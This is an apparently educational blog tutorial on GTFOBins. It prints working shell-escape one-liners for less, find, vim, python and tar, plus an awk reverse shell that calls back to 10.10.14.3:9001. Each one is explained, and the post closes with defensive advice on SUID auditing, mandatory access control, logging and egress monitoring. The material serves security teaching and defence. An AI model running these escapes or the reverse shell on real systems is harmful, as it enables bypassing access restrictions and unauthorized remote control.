GTFOBins in the Wild: Abusing Legitimate Linux Binaries for Persistence and Privilege Escalation

Introduction

In the world of Linux security, not every malicious action requires custom malware. In fact, some of the most effective techniques rely solely on what’s already available in the system — legitimate binaries pre-installed on most distributions. This is the world of GTFOBins (Get The F*** Out Binaries): a curated list of Unix binaries that can be exploited by attackers to bypass restrictions, escalate privileges, exfiltrate data, and maintain access.

What Are GTFOBins?

GTFOBins is a community-maintained project that catalogs Unix binaries that can be repurposed for post-exploitation. These binaries are often used during penetration tests, red teaming exercises, and by actual threat actors to perform actions like spawning shells, downloading files, reading sensitive information, or persisting on systems — all without triggering antivirus or EDR tools.

The power of GTFOBins lies in their legitimacy. Since these are standard system tools with valid use cases, they often fly under the radar of security monitoring solutions. When a legitimate system binary like tar or find is used, it doesn’t typically raise the same red flags as an unknown executable would.

Real-World Abuse Examples

Let’s explore some practical examples of GTFOBins that you can test in your own environment. For each example, we’ll break down exactly how and why these commands work.

1. less – Shell Escape

less /etc/passwd
!bash

How it works: The less command is a pager used to view text files one screen at a time. However, it contains a feature that allows users to execute shell commands directly from within the pager by prefixing the command with an exclamation mark (!).

When you run less /etc/passwd, you’re viewing the system’s password file. Then, by typing !bash while in the less interface, you’re telling less to spawn a bash shell. This technique is particularly useful when less is allowed in a restricted environment, as it effectively bypasses those restrictions.

Security implications: If a user has permission to run less but is otherwise restricted from running shell commands, this escape can completely undermine those restrictions. System administrators might not expect a pager like less to provide shell access.

You can use ExplainShell.com to understand the basic less command, though the escape functionality is part of less’s internal features rather than command-line options.

2. find – Execute Arbitrary Commands

find . -exec /bin/sh \; -quit

How it works: The find command is designed to search for files in a directory hierarchy. The -exec option allows find to execute a command on each file it finds. In this example: - . tells find to start searching in the current directory - -exec /bin/sh \; tells find to execute the shell (/bin/sh) for each file it finds - \; marks the end of the command to be executed - -quit tells find to exit after the first match, which means the shell is spawned immediately

The result is that find immediately executes a shell without even needing to find a matching file. This technique works because the -exec option is a legitimate feature of find intended for file processing.

Security implications: Many systems grant users the ability to use find because it’s essential for locating files. However, this same capability can be repurposed to execute arbitrary commands.

You can analyze this command on ExplainShell.com to see a detailed breakdown of each part.

3. vim – Escape to Shell

vim -c '!bash'

How it works: Vim is a powerful text editor commonly found on Unix-like systems. The -c option allows vim to execute a command when it starts. In vim, just like in less, the exclamation mark (!) is used to run shell commands.

When you run this command, vim starts and immediately executes the shell command ‘bash’, giving you a bash shell. This happens so quickly that you might not even notice vim launched.

Security implications: Many administrators don’t realize that text editors like vim can execute shell commands. If a user is permitted to run vim but isn’t supposed to have shell access, this command defeats that restriction.

For a detailed explanation of vim’s command-line options, check ExplainShell.com.

4. python – One-Line Shell Spawn

python -c 'import os; os.system("/bin/bash")'

How it works: Python is a programming language installed on many Linux systems. The -c flag allows you to run Python code directly from the command line. This example: - Imports the ‘os’ module, which provides a way to use operating system dependent functionality - Uses the os.system() function to execute the shell command /bin/bash

The result is that Python starts, executes this code, and spawns a bash shell.

Security implications: Programming languages like Python are incredibly versatile and can interact with the operating system in various ways. If users are allowed to run Python but are supposed to be restricted from shell access, this technique bypasses that restriction.

Examine this command on ExplainShell.com to understand the Python command-line options.

5. tar – Command Execution via Checkpoint

tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash

How it works: The tar utility is used for creating and manipulating archive files. However, it has some lesser-known features that can be exploited: - -cf /dev/null /dev/null tells tar to create (-c) an archive file (-f) at /dev/null containing the file /dev/null - --checkpoint=1 tells tar to display a progress message after processing one file - --checkpoint-action=exec=/bin/bash tells tar to execute /bin/bash when it reaches a checkpoint

Since /dev/null is a special file that discards all data written to it, this command effectively does nothing with files but executes bash when the checkpoint is reached.

Security implications: Archive utilities like tar are common on Linux systems and might be permitted in environments where shell access is restricted. Using this technique, an attacker can leverage tar to gain shell access.

For a full breakdown of this command’s components, visit ExplainShell.com.

6. awk – Reverse Shell Creation

awk 'BEGIN {s = "/inet/tcp/0/10.10.14.3/9001"; while(42) { if((s |& getline c) <= 0) break; while (c |& getline) print $0 |& s; close(s); }}'

How it works: AWK is a programming language designed for text processing. On some systems, AWK’s |& operator can be used to establish network connections and execute commands.

This complex one-liner: - Creates a TCP connection to IP address 10.10.14.3 on port 9001 - Sets up a loop to continuously read from this connection - Executes any commands received and sends the output back over the connection

The result is a reverse shell that connects back to the attacker’s machine. This is particularly useful for bypassing firewalls that block incoming connections but allow outgoing ones.

Security implications: Text processing tools like AWK are common on Unix systems and might not be restricted. This example shows how a seemingly innocent text processing tool can be used to establish unauthorized network connections.

While this command is too complex for a simple ExplainShell analysis, understanding AWK’s networking capabilities is crucial for security professionals.

Setting Up a GTFOBins Testing Lab

To safely explore these techniques, you should set up a controlled testing environment. Here’s how to create a simple virtual machine for this purpose:

1. Download and install a virtualization platform like VirtualBox
2. Create a new virtual machine and install a Linux distribution like Ubuntu or Debian
3. Ensure the VM is isolated from your production network
4. Open a terminal in your VM to start experimenting

Remember, never test these techniques on production systems or without proper authorization.

Defense and Detection Strategies

Understanding GTFOBins techniques is essential for both offensive and defensive security professionals. Here are comprehensive strategies to defend against these attacks:

1. Audit SUID Binaries Regularly

SUID (Set User ID) binaries run with the permissions of the file owner, not the user executing them. This can be particularly dangerous if misused.

find / -perm -4000 -type f 2>/dev/null

This command finds all SUID binaries on the system. Review this list carefully and remove unnecessary SUID permissions.

2. Implement Mandatory Access Control

Use systems like AppArmor or SELinux to create granular control over what processes can do:

• AppArmor profiles can limit which files a program can access and what operations it can perform
• SELinux policies can define comprehensive restrictions based on users, roles, and types

These systems can prevent even legitimate programs from performing unauthorized actions.

3. Command Auditing and Logging

Implement comprehensive logging:

• Use auditd to log command execution
• Configure syslog to capture detailed command information
• Deploy endpoint detection and response (EDR) tools that can identify suspicious command patterns

Review logs regularly for unusual command patterns that might indicate GTFOBins abuse.

4. Restrict Interactive Shell Access

Whenever possible:

• Use restricted shells for users who don’t need full shell access
• Implement jump servers with controlled command execution
• Use sudo with specific command restrictions rather than full access

For example, instead of allowing full sudo access, specify exactly which commands a user can run with sudo.

5. Monitor Network Activity

Since many GTFOBins techniques are used to establish unauthorized connections:

• Monitor outbound connections, especially on unusual ports
• Implement egress filtering on your network
• Use tools like Zeek (formerly Bro) to analyze network patterns
• Deploy a properly configured firewall to limit outbound connections

Understanding the GTFOBins Project

The GTFOBins project maintains an up-to-date database of Unix binaries that can be exploited. The project categorizes binaries based on the security implications:

• Shell: Programs that can break out to a shell
• File Read: Programs that can be abused to read files
• File Write: Programs that can be abused to write files
• SUID: Programs that can exploit SUID permissions
• Sudo: Programs that can be abused within sudo
• Capabilities: Programs that can abuse Linux capabilities
• Limited SUID: Programs with limited SUID exploitation potential

Security professionals should regularly review this resource to understand potential attack vectors.

Real-World Incident Example

To illustrate the real-world impact of GTFOBins, consider this anonymized case study:

A system administrator at a financial institution noticed unusual network traffic from a server. Investigation revealed that an attacker had gained initial access through a vulnerability, but had limited shell access in a restricted environment. Using the less escape technique, the attacker broke out of the restricted environment, gained full shell access, and installed persistence mechanisms.

The attack went undetected for weeks because the attacker only used legitimate system binaries rather than uploading custom malware. This highlights why understanding GTFOBins techniques is crucial for effective security monitoring.

Conclusion

GTFOBins serve as a powerful reminder that the most dangerous tools are often the ones already installed on our systems. By understanding how legitimate binaries can be repurposed for malicious purposes, security professionals can better defend their systems against these subtle but effective attacks.

For system administrators, the key takeaway is clear: don’t assume that restricting access to “dangerous” commands is sufficient. Even seemingly innocuous utilities like text editors and file viewers can be weaponized in the right circumstances.

For security practitioners, GTFOBins techniques should be part of your standard testing methodology. They represent realistic attack vectors that actual threat actors use in the wild.

Remember to always use ExplainShell.com to break down and understand any commands you encounter. This tool can help you analyze the components of potentially malicious commands and understand exactly how they work.

Use this knowledge wisely — and defend against it fiercely.

Inspired by the GTFOBins project: https://gtfobins.github.io/ — support the project and always test in a controlled environment.